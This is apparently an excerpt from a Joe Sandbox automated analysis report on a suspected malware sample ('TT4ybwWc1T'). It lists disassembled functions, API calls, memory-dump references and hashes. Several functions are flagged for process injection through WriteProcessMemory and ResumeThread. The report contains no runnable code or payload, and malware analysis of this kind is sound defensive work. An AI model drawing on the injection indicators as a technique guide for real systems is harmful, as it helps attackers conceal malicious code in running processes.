Part of subcall function 6C94AC75: RaiseException.KERNEL32(?,?,6C949C34,65628154,?,?,?,?,6C949C34,65628154,6C979C90,6C98B974,65628154), ref: 6C94ACB7

Part of subcall function 6C949BB5: std::exception::exception.LIBCMT ref: 6C949C04
Part of subcall function 6C949BB5: std::exception::exception.LIBCMT ref: 6C949C1E
Part of subcall function 6C949BB5: __CxxThrowException@8.LIBCMT ref: 6C949C2F

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$Copy_strExceptionRaise_mallocstd::exception::_
String ID:
API String ID: 2813683038-0
Opcode ID: cfdad86176aed0262134d4fa8f3528c20d333d187b552d71b21860d43100c408
Instruction ID: dc2c2661edacf8d103faa6cfab06b2f3b78ad74b4353d5348ce511b43b5f9635
Opcode Fuzzy Hash: cfdad86176aed0262134d4fa8f3528c20d333d187b552d71b21860d43100c408
Instruction Fuzzy Hash: 0491B0B18083049FD710CF59C942B9AFBF8EF95354F15896AE4259BBA0E3B1D5088F92

Uniqueness

Uniqueness Score: -1.00%

Function 6C8FBDF7 Relevance: 3.2, APIs: 2, Instructions: 200COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C8FBE2D
IsBadReadPtr.KERNEL32(00000000,00000008,?,?,?), ref: 6C8FBE6D

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroyReadSafe
String ID:
API String ID: 616443815-0
Opcode ID: c268b03a26d1bdcd80b0e280abce038914c374b94267b4335a9ce983023118d1
Instruction ID: f9ace6112947f10db3d5f150fe72121081d8f6daa37f032f5e8ed56e82702fe6
Opcode Fuzzy Hash: c268b03a26d1bdcd80b0e280abce038914c374b94267b4335a9ce983023118d1
Instruction Fuzzy Hash: 2B71F170D046965EEB31CE75CA40679BBB1AF0A368F288B5CD9B597AD1C331D443CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F62C0 Relevance: 3.1, APIs: 2, Instructions: 149COMMON

Download Yara Rule

APIs

Part of subcall function 6C949BB5: _malloc.LIBCMT ref: 6C949BCF

std::exception::exception.LIBCMT ref: 6C8F6466

Part of subcall function 6C949533: std::exception::_Copy_str.LIBCMT ref: 6C94954E

__CxxThrowException@8.LIBCMT ref: 6C8F647D

Part of subcall function 6C94AC75: RaiseException.KERNEL32(?,?,6C949C34,65628154,?,?,?,?,6C949C34,65628154,6C979C90,6C98B974,65628154), ref: 6C94ACB7

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID:
API String ID: 2299493649-0
Opcode ID: 06ad50b4b125b430ac67a80f3e1cd6bf16303e6c1b4fbadde0ae91afe0838ae2
Instruction ID: 8a11edd23fb8ba219ac64a968abf5e29358aca13ae62ecb27262fdc987485ed2
Opcode Fuzzy Hash: 06ad50b4b125b430ac67a80f3e1cd6bf16303e6c1b4fbadde0ae91afe0838ae2
Instruction Fuzzy Hash: 28516DB29093409FD720CF58CA81A4ABBE4FB95740F518D2EF56987B90D371D909CB93

Uniqueness

Uniqueness Score: -1.00%

Function 6C90D2E0 Relevance: 3.1, APIs: 2, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 6C949BB5: _malloc.LIBCMT ref: 6C949BCF

std::exception::exception.LIBCMT ref: 6C90D3E8
__CxxThrowException@8.LIBCMT ref: 6C90D3FF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID:
API String ID: 4063778783-0
Opcode ID: 07dfdb45f3b2c31a0063cb8d0a563851d75860e7a46a001078994970cd078785
Instruction ID: b578ea59f2db8471269a13aa7cec80aaab6f4b09a6edbbb198cd75572db3cf6e
Opcode Fuzzy Hash: 07dfdb45f3b2c31a0063cb8d0a563851d75860e7a46a001078994970cd078785
Instruction Fuzzy Hash: B83141756057059FC704CF29C48099AB7F4FF99714F608A2EF4558BB50E731E90ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F8400 Relevance: 3.0, APIs: 2, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 6C949BB5: _malloc.LIBCMT ref: 6C949BCF

std::exception::exception.LIBCMT ref: 6C8F8449
__CxxThrowException@8.LIBCMT ref: 6C8F845E

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID:
API String ID: 4063778783-0
Opcode ID: 46c019332bcea7f934b81414d8cacb6a6df27b8ac463975c64242351fdc46946
Instruction ID: 9dbf7d2daa4d3c97102ebaf0a526202c19ffa502904c7b309498a3eaf9d62063
Opcode Fuzzy Hash: 46c019332bcea7f934b81414d8cacb6a6df27b8ac463975c64242351fdc46946
Instruction Fuzzy Hash: A301C8755002089FC718DF54D590C9AB7B5EF69300B21C5BEDD2A4BB50DB30EA05CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F8D60 Relevance: 2.6, APIs: 2, Instructions: 78COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,6C8F8C13,?,6C8F8CD3,?,6C8F8C13,00000000,?,?,6C8F8C13,?,?), ref: 6C8F8D73
LeaveCriticalSection.KERNEL32(?,?,?,6C8F8CD3,?,6C8F8C13,00000000,?,?,6C8F8C13,?,?), ref: 6C8F8D8C

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: b2d8f86ece9288c6767b76fff68efc19f124339ab9f0d64a7aba9ffe53b7b4e4
Instruction ID: 16eaf6bb033ec9774d3800f5ef6f6a0906b76a0204447eba0bdc87c67fdbb0f4
Opcode Fuzzy Hash: b2d8f86ece9288c6767b76fff68efc19f124339ab9f0d64a7aba9ffe53b7b4e4
Instruction Fuzzy Hash: 64211676204109EF8B14DF89D990DAAB3BAFFC9310B148659E9168B340C730EE16CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F8BC0 Relevance: 2.6, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,6C8F6890,?), ref: 6C8F8BDD
LeaveCriticalSection.KERNEL32(?), ref: 6C8F8C23

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: ce693a307e04a9ece826adfc0616e7ced362d034bc6c7e41c9376922a3bc5666
Instruction ID: 23ab5d4ccdf442148596221a18fc2164aad79e5db35a756b76b4de82d6c97ee5
Opcode Fuzzy Hash: ce693a307e04a9ece826adfc0616e7ced362d034bc6c7e41c9376922a3bc5666
Instruction Fuzzy Hash: 3501BC72309104AFC754DFA9C99099AF3A8FB99200710466AE945C7700DB32ED51CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 056DC018 Relevance: 2.1, APIs: 1, Instructions: 606injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 056DC4C5

Memory Dump Source

Source File: 00000000.00000002.1372910156.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56d0000_TT4ybwWc1T.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 6f15a64eb066ef3ced701c211baa2e1ea6bc2a1b37c0ce4819046cee630ab2f5
Instruction ID: 5be3f67d9709371404f527c28661993ffdd3f75e3e8ed26a11fdd59b08b2bced
Opcode Fuzzy Hash: 6f15a64eb066ef3ced701c211baa2e1ea6bc2a1b37c0ce4819046cee630ab2f5
Instruction Fuzzy Hash: 3941BBB5D042989FDB01CFA9D984AEEFBF1BF4A310F14946AE418BB250D335A944CF64

Uniqueness

Uniqueness Score: -1.00%

Function 6C90E2CE Relevance: 1.7, APIs: 1, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: _malloc
String ID:
API String ID: 1579825452-0
Opcode ID: 6790efaee02e092b7e58b2e01c1520fd6f1891497b5d1dd8be31761ce530ee2b
Instruction ID: 0abdde813ab891f3cd49244900b77942afeb58e083c7f12651d75e2eaa3e43d3
Opcode Fuzzy Hash: 6790efaee02e092b7e58b2e01c1520fd6f1891497b5d1dd8be31761ce530ee2b
Instruction Fuzzy Hash: 2C81A5F1A093408FEB209F68858174EBBE8AF91348F158D7ED1998BB90D775D448CB93

Uniqueness

Uniqueness Score: -1.00%

Function 056DC3F0 Relevance: 1.6, APIs: 1, Instructions: 115injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 056DC4C5

Memory Dump Source

Source File: 00000000.00000002.1372910156.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56d0000_TT4ybwWc1T.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 239fff48681eb2b63b0178786ca1a0d5ad77539cf9a55c0dd0b194bc70988939
Instruction ID: 1de5a837f33061d1f99de05bc770cd1aab8b0e3ce4184d49d86a78fe973d46c7
Opcode Fuzzy Hash: 239fff48681eb2b63b0178786ca1a0d5ad77539cf9a55c0dd0b194bc70988939
Instruction Fuzzy Hash: EE4167B5D002589FDF10CFA9D984AEEFBF5BB49310F24942AE818B7210D375A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F7140 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

Part of subcall function 6C912820: _malloc.LIBCMT ref: 6C912871

std::tr1::_Xweak.LIBCPMT ref: 6C8F71D2

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Xweak_mallocstd::tr1::_
String ID:
API String ID: 4085767713-0
Opcode ID: 53126f4e4b7836677d0d0e353aad509d0a81658d35fcf3165c0e99d739c0823f
Instruction ID: a35dc57b12449cd6b29291db3c7b9b5edd2b3c9da67fce9618afff309bdd9f8a
Opcode Fuzzy Hash: 53126f4e4b7836677d0d0e353aad509d0a81658d35fcf3165c0e99d739c0823f
Instruction Fuzzy Hash: 6E318574A0574A9FDB20CFA9C980AABB7F5FF49208F208A5DE82597B41D331E945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 056DC541 Relevance: 1.6, APIs: 1, Instructions: 76threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 056DC5C5

Memory Dump Source

Source File: 00000000.00000002.1372910156.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56d0000_TT4ybwWc1T.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 861949f765b45ba652bfad08b7becc998e718297f0b80a263abfb31b4ccb1a8a
Instruction ID: a34979885941201179585c11dc451fd82400a63dd1a4063520d6a65bcbf79587
Opcode Fuzzy Hash: 861949f765b45ba652bfad08b7becc998e718297f0b80a263abfb31b4ccb1a8a
Instruction Fuzzy Hash: FA31A9B5D012589FCB10CFAAE984ADEFBF5EB49310F10841AE814B7310D775A941CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 056DC548 Relevance: 1.6, APIs: 1, Instructions: 71threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 056DC5C5

Memory Dump Source

Source File: 00000000.00000002.1372910156.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56d0000_TT4ybwWc1T.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0736df85c31d5ce1488067074a72a918931beb0b259f910c800c465984aa5b99
Instruction ID: 4f17c4237b08e7b2fecca132b95672cb0b26f1c9c00bdd3b108fc1aecd45f409
Opcode Fuzzy Hash: 0736df85c31d5ce1488067074a72a918931beb0b259f910c800c465984aa5b99
Instruction Fuzzy Hash: 763198B4D012589FDB10CFAAD984ADEFBF4AB49310F10941AE819B7310D775A901CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 6C9525C3 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6C94CB3E,6C949BD4,?,00000000,00000000,00000000,?,6C94EA98,00000001,00000214), ref: 6C952606

Part of subcall function 6C94D7D8: __getptd_noexit.LIBCMT ref: 6C94D7D8

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 104428634fbd2acbb6632b5d049204d7bd2034fdd58732d92823cb57e6b9243e
Instruction ID: 7e00c3d3adf7d5ac9ae52c3db4a6256c290d6d986555a26fb6d1ed7612a6ffad
Opcode Fuzzy Hash: 104428634fbd2acbb6632b5d049204d7bd2034fdd58732d92823cb57e6b9243e
Instruction Fuzzy Hash: EE01D8313076159BEB14DE25CC68B6B336CBB92768F64466AE865CB9D0D730D4218680

Uniqueness

Uniqueness Score: -1.00%

Function 6C90EA40 Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C949BB5: _malloc.LIBCMT ref: 6C949BCF

SysAllocString.OLEAUT32 ref: 6C90EA8D

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: AllocString_malloc
String ID:
API String ID: 959018026-0
Opcode ID: b69a829a20f22e0fe122f5a4e8e721639b10178973ec743533ff3eca76c4511f
Instruction ID: d44942a55f6d4f4fb6828a413b6492763065860227912a1e50d8ed074703acde
Opcode Fuzzy Hash: b69a829a20f22e0fe122f5a4e8e721639b10178973ec743533ff3eca76c4511f
Instruction Fuzzy Hash: 7B01C071905A14EBD310CF94C901B9AB7B8EB1AB24F10831EE861A7B80D7B5D900CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6C949D21 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6C94E8DC

Part of subcall function 6C949BB5: _malloc.LIBCMT ref: 6C949BCF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: H_prolog3_catch_malloc
String ID:
API String ID: 529455676-0
Opcode ID: ebcab9906d90ab8c4ab30eaf3713de2d78a68c9c2296ee43f6152b08c3e1d107
Instruction ID: c45e777a5470b6b69828dbf80260a358f3ff70636617a49d9f518af13ef19444
Opcode Fuzzy Hash: ebcab9906d90ab8c4ab30eaf3713de2d78a68c9c2296ee43f6152b08c3e1d107
Instruction Fuzzy Hash: 7BD05E319242089BCB41EB988505BAD7BA4AB61326F90C065E008BAB80DB71CA188796

Uniqueness

Uniqueness Score: -1.00%

Function 6C94A510 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

___security_init_cookie.LIBCMT ref: 6C94A510

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ___security_init_cookie
String ID:
